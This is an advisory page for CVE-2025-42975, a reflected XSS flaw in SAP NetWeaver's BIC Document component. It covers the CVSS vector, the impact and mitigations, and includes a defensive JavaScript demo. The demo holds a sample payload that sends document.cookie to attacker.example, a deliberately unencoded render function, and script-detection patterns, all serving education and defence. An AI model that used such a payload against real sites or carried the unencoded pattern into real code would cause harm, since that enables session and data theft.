CVE-2025-42975: CWE-79: Improper Neutralization of Input During Web Page Generation in SAP_SE SAP NetWeaver Application Server ABAP (BIC Document)

Medium
Tags: Vulnerability, CVE-2025-42975, CWE-79
Published: Tue Aug 12 2025 (08/12/2025, 02:10:00 UTC)
Source: CVE Database V5
Vendor/Project: SAP_SE
Product: SAP NetWeaver Application Server ABAP (BIC Document)

Description

SAP NetWeaver Application Server ABAP (BIC Document) allows an unauthenticated attacker to craft a URL link which, when accessed on the BIC Document application, embeds a malicious script. When a victim clicks on this link, the script executes in the victim's browser, allowing the attacker to access and/or modify information related to the web client without affecting availability.

AI-Powered Analysis

Last updated: 08/20/2025, 02:01:54 UTC

Technical Analysis

CVE-2025-42975 is a medium-severity vulnerability in SAP NetWeaver Application Server ABAP, specifically the BIC Document component. It is classified as CWE-79, Improper Neutralization of Input During Web Page Generation, better known as Cross-Site Scripting (XSS). Because the payload travels in a URL that the attacker crafts and the victim opens, this is a reflected XSS: the BIC Document application echoes attacker-controlled URL input into the page it generates without encoding it for the HTML context, and the victim's browser executes the embedded script in the origin of the SAP web client. No authentication is needed to craft the link; only the victim, who may well be an authenticated SAP user, has to click it.

Script running in that origin can read or alter data displayed or submitted through the web client and issue requests in the victim's name, so the confidentiality and integrity of data handled by the client are at risk. Availability is not affected.

The affected versions listed cover multiple releases of SAP NetWeaver Application Server ABAP and SEM-BW: S4COREOP 104 through 108 and SEM-BW 600 through 748.

The CVSS v3.1 base score is 6.1 (medium), vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N: network attack vector, low attack complexity, no privileges required, user interaction required. The scope is changed (S:C) for the reason it is changed for reflected XSS generally: the vulnerable component is the SAP server, but the impact lands in a different security authority, the victim's browser. It does not mean that other SAP modules or connected systems are compromised. Confidentiality and integrity impact are rated low (C:L/I:L) and availability is unaffected (A:N).

No exploits in the wild were known at the time of publication, and no patch is linked on this page. SAP publishes fixes for the CVEs it assigns as SAP Security Notes, so the authoritative remediation is the security note covering this CVE in the SAP Support Portal, together with any configuration guidance it gives. The vulnerability matters because SAP NetWeaver underpins critical business processes in many enterprises, and a client-side attack on an authenticated business user can disclose or modify sensitive business data.

Potential Impact

For European organizations, the impact of CVE-2025-42975 can be considerable given the widespread adoption of SAP NetWeaver in manufacturing, finance, logistics, and public administration. Successful exploitation could expose or alter sensitive business information handled through the SAP web client, including financial data, operational metrics, or personally identifiable information. Although availability is not affected, a breach of confidentiality or integrity can mean regulatory non-compliance under GDPR, reputational damage, and financial loss. Because exploitation requires the victim to open a crafted link, phishing or social engineering is the likely delivery path, and the risk rises where users routinely receive SAP links by e-mail or chat and where security awareness is less mature. The changed scope in the CVSS vector describes where the damage occurs, not how far it spreads: the script runs in the victim's browser rather than on the server, and what it can reach is whatever that browser session can reach in the SAP web client, which for an authenticated business user can be substantial. Given SAP's role in enterprise resource planning and in parts of critical infrastructure, leaked or manipulated data could indirectly disrupt business continuity. European organizations with extensive SAP deployments should therefore treat this vulnerability as a significant risk, especially in industries with stringent data protection requirements.

Mitigation Recommendations

To mitigate CVE-2025-42975 effectively, organizations should combine several measures:

1) Monitor SAP security advisories and apply the SAP Security Note for this CVE as soon as it is available, prioritising systems running the affected versions listed above. The vendor correction is the only fix for the vulnerable code itself; everything below reduces exposure or blast radius.

2) In custom ABAP web development on the same stack, neutralize untrusted data at output time with encoding that matches the context it is written into (HTML text, HTML attribute, URL, JavaScript), using the ABAP stack's escaping functions rather than input blacklists, and review existing code for request parameters echoed into generated pages.

3) Put Web Application Firewall rules in front of SAP web interfaces that flag or block query strings carrying markup or script fragments. Treat this as a stopgap: such patterns are bypassable through alternative encodings and split payloads.

4) Train users to be wary of unsolicited links into SAP systems, since exploitation depends on a victim clicking a crafted URL.

5) Limit who can reach the SAP web applications at all: network segmentation, access through a reverse proxy or VPN, and multi-factor authentication shrink both the attacker's reach and the pool of users whose sessions are worth attacking.

6) Include SAP web services in regular security assessments and penetration tests to find similar reflected-input issues before attackers do.

7) Set a Content-Security-Policy on the SAP web client that does not allow 'unsafe-inline' script; a reflected script block is then refused by the browser. Roll it out in Content-Security-Policy-Report-Only mode first, because SAP UI frameworks may depend on inline script and break under a strict policy.

8) Reduce attack surface: in transaction SICF, check whether the ICF service behind the BIC Document application is active and deactivate it if the function is not used, and review other unused web services the same way.
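The pattern the analysis above and recommendations 2, 3 and 7 describe, as an added example that is not code from this page or from SAP: a URL parameter echoed into generated HTML unencoded (the CWE-79 defect), the same template with HTML-entity encoding, a link-inspection heuristic of the kind a WAF or mail-gateway rule applies, and a check of whether a Content-Security-Policy value would let a reflected inline script run. The path `/sap/bc/bic/document`, the parameter name `docid`, the hostnames and the sample links are assumptions constructed for illustration; the real BIC Document endpoint and parameter are not given on this page.

```javascript
// Added example, not SAP code. The endpoint path and the "docid" parameter are
// ASSUMED for illustration; the page does not name the real ones.
const BASE_URL = "https://sap.example.internal/sap/bc/bic/document"; // assumed path

// HTML-entity encoding for data placed in element content or a quoted attribute.
// Encoding the output, not filtering the input, is the CWE-79 fix: the data is
// preserved but can no longer change the structure of the markup.
function encodeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "/": "&#x2F;" };
  return String(value).replace(/[&<>"'/]/g, (c) => map[c]);
}

// Vulnerable pattern: the URL parameter is concatenated straight into the page,
// so whoever crafts the link controls the markup the victim's browser parses.
function renderVulnerable(url) {
  const docId = new URL(url).searchParams.get("docid") ?? "";
  return `<h1>BIC Document</h1><p>Document: ${docId}</p>`;
}

// Hardened pattern: identical template, untrusted data encoded for the HTML context.
function renderHardened(url) {
  const docId = new URL(url).searchParams.get("docid") ?? "";
  return `<h1>BIC Document</h1><p>Document: ${encodeHtml(docId)}</p>`;
}

// Crude "did the injection land?" check: a script element, an event-handler
// attribute inside a tag, or a javascript: URL, none of which the template emits.
function containsActiveContent(html) {
  return /<script\b|<[^>]+\son\w+\s*=|javascript:/i.test(html);
}

// Link-inspection heuristic of the kind a WAF, proxy or mail gateway applies:
// flag links whose decoded query values carry markup, script or entity escapes.
// Heuristics like this are bypassable (alternate encodings, split payloads);
// they reduce exposure, they do not replace the vendor fix.
function isSuspiciousLink(url) {
  let u;
  try { u = new URL(url); } catch { return true; } // unparseable link: treat as suspicious
  for (const value of u.searchParams.values()) {
    if (/[<>]|javascript:|\bon\w+\s*=|&#x?[0-9a-f]+;?/i.test(value)) return true;
  }
  return false;
}

// Would this Content-Security-Policy header value let a reflected inline <script>
// run? The governing directive is script-src, falling back to default-src. Inline
// script runs only with 'unsafe-inline', and even that is ignored when a nonce or
// hash source is present (which a reflected payload cannot know).
function cspAllowsInlineScript(headerValue) {
  const directives = new Map();
  for (const part of headerValue.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives.set(tokens[0].toLowerCase(), tokens.slice(1));
  }
  const sources = directives.get("script-src") ?? directives.get("default-src");
  if (!sources) return true; // no applicable directive: nothing restricts inline script
  const lower = sources.map((s) => s.toLowerCase());
  if (lower.some((s) => s.startsWith("'nonce-") || s.startsWith("'sha"))) return false;
  return lower.includes("'unsafe-inline'");
}

// A policy of the shape recommendation 7 describes (assumed values, test before enforcing).
const HARDENED_CSP = "default-src 'self'; script-src 'self'; object-src 'none'; frame-ancestors 'none'";

// Constructed sample links: one legitimate, one carrying a payload in the query string.
const benignLink = `${BASE_URL}?docid=INV-2025-0001`;
const payload = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';
const maliciousLink = `${BASE_URL}?docid=${encodeURIComponent(payload)}`;

// What each check concludes for the two constructed links.
function demo() {
  return {
    vulnerableExecutes: containsActiveContent(renderVulnerable(maliciousLink)),
    hardenedExecutes: containsActiveContent(renderHardened(maliciousLink)),
    hardenedKeepsData: renderHardened(benignLink).includes("INV-2025-0001"),
    linkFlagged: isSuspiciousLink(maliciousLink),
    benignFlagged: isSuspiciousLink(benignLink),
    cspStopsInline: !cspAllowsInlineScript(HARDENED_CSP),
  };
}

console.log(demo());
```

Run it with node: the vulnerable render carries the script element through to the browser, the hardened render keeps the document identifier but neutralizes the payload, the link heuristic flags the crafted link and passes the benign one, and the hardened policy refuses inline script. Only the encoding in `renderHardened` (or the vendor's correction of the real code) removes the defect; the link heuristic and the CSP are layers that limit what a still-vulnerable page can do to its users.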

Technical Details

Data Version
5.1
Assigner Short Name
sap
Date Reserved
2025-04-16T13:25:45.231Z
Cvss Version
3.1
State
PUBLISHED

Threat ID: 689aa7d2ad5a09ad002be798

Added to database: 8/12/2025, 2:32:50 AM

Last enriched: 8/20/2025, 2:01:54 AM

Last updated: 8/29/2025, 7:08:25 AM